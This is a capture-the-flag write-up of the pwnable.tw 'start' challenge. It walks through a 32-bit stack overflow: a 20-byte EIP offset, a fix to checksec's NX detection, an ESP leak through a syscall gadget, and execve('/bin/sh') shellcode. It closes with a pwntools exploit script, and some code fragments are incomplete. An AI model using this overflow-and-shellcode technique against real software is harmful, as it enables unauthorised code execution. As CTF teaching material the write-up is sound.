This is another binary exploitation challenge, this time from

Just a start. nc 10000 start

Let’s inspect binary:

root@kali:~/ctf/pwnable.tw_start# file start
start: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped

Check for security measures using checksec:

Checksec result

And let’s run decompiler:

Decompilation result

We see that binary is very simple, it makes two Linux syscalls, first write (0x04) and then it takes user input using read (Ox03). Type of call depends on the value in EAX, if you want more information about parameters for syscalls you can take a look at

Now, we can run binary :

root@kali:~/ctf/pwnable.tw_start# ./start
Let's start the CTF:test

We can use gdb-peda as we did in the previous post to detect offset of EIP.

gdb-peda$ pattern search
Registers contain pattern buffer:
EIP+0 found at offset: 20
Registers point to pattern buffer:
[ECX] --> offset 0 - size ~631
[ESP] --> offset 24 - size ~697
Pattern buffer found at:
0xffffd304 : offset    0 - size   40 ($sp + -0x18 [-6 dwords])
Reference to pattern buffer not found in memory

We see that the offset of EIP is 20. Since binary is very small there is only one ret; instruction so it is probably not exploitable using ROP. Another problem is that we have NX bit set which means we also can’t use shellcode. At this point I was stuck. Challenge looked way harder then the first challenge in series should be, so I decided to inspect binary a bit more. Let’s run readelf:

root@kali:~/ctf/pwnable.tw_start# readelf -l ./start

Elf file type is EXEC (Executable file)
Entry point 0x8048060
There is 1 program header, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg 
  LOAD           0x000000 0x08048000 0x08048000 0x000a3 0x000a3 R E

Section to Segment mapping:
  Segment Sections...
   00     .text

It is interesting to see that there is no GNU_STACK header. And if we look at how checksec does NX bit check, we see:

  # check for NX support
  $debug && echo -e "\n***function filecheck->nx"
  if $readelf -W -l "$1" 2>/dev/null | grep 'GNU_STACK' | grep -q 'RWE'; then
    echo_message '\033[31mNX disabled\033[m   ' 'NX disabled,' ' nx="no"' '"nx":"no",'
    echo_message '\033[32mNX enabled \033[m   ' 'NX enabled,' ' nx="yes"' '"nx":"yes",'

Since it greps for GNU_STACK and checks for RWE permission on the result, even in the case that no GNU_STACK header is defined in binary, it will report that NX is enabled. So in the end it seems that we should try shellcode. Let’s just quickly fix checksec:

  # check for NX support
  $debug && echo -e "\n***function filecheck->nx"
  if $readelf -W -l "$1" 2>/dev/null | grep -q 'GNU_STACK'; then
    if $readelf -W -l "$1" 2>/dev/null | grep 'GNU_STACK' | grep -q 'RWE'; then
      echo_message '\033[31mNX disabled\033[m   ' 'NX disabled,' ' nx="no"' '"nx":"no",'
      echo_message '\033[32mNX enabled \033[m   ' 'NX enabled,' ' nx="yes"' '"nx":"yes",'
    echo_message '\033[31mNX disabled\033[m   ' 'NX disabled,' ' nx="no"' '"nx":"no",'

First, we need to find a stack address so we can point EIP to the right place. Fortunately for us, one of the first instructions is push esp; which saves stack pointer to the stack. If we look at the flow of program we see that:

  1. mov ecx, esp; will make write syscall read from the current stack address.

  2. before retn; we have add esp, 14h; which removes all of that data pushed on stack after stack pointer (5 push instructions setting strings on the stack) making ESP point to the saved stack pointer.

So if we trigger write again it will read saved stack pointer address. To do that we can use following ROP gadget:

0x08048087:mov ecx, esp; mov dl, 0x14; mov bl,1; mov al, 4;int 0x80;

So first payload we use is going to be:

'A'* 20 + p32(0x08048087)

After our first input, the program will give us a stack pointer address and trigger the next read syscall (since first ret; instruction, if we look at the original assembly, is after read). This time we are going to put shellcode on the stack and point EIP to leaked stack pointer address. Let’s use simple execve syscall:

shellcode = asm('\n'.join([
    'push %d' % u32('/sh\0'),
    'push %d' % u32('/bin'),
    'xor edx, edx',
    'xor ecx, ecx',
    'mov ebx, esp',
    'mov eax, 0xb',
    'int 0x80',

payload = "A"*20  + p32(esp + 20) + shellcode

And we get a shell :D


We can combine all of this in one pwntool script for simplicity.

from pwn import *

def leak_esp(r):
    address_1 = p32(0x08048087)             # mov ecx, esp; mov dl, 0x14; mov bl, 1; mov al, 4; int 0x80; 
    payload = 'A'*20 + address_1
    print r.recvuntil('CTF:')
    esp = u32(r.recv()[:4])
    print "Address of ESP: ", hex(esp)
    return esp

shellcode = asm('\n'.join([
    'push %d' % u32('/sh\0'),
    'push %d' % u32('/bin'),
    'xor edx, edx',
    'xor ecx, ecx',
    'mov ebx, esp',
    'mov eax, 0xb',
    'int 0x80',

if __name__ == "__main__":
    context.arch = 'i386'
    r = remote('', 10000)
    esp = leak_esp(r)
    payload = "A"*20  + p32(esp + 20) + shellcode 

- F3real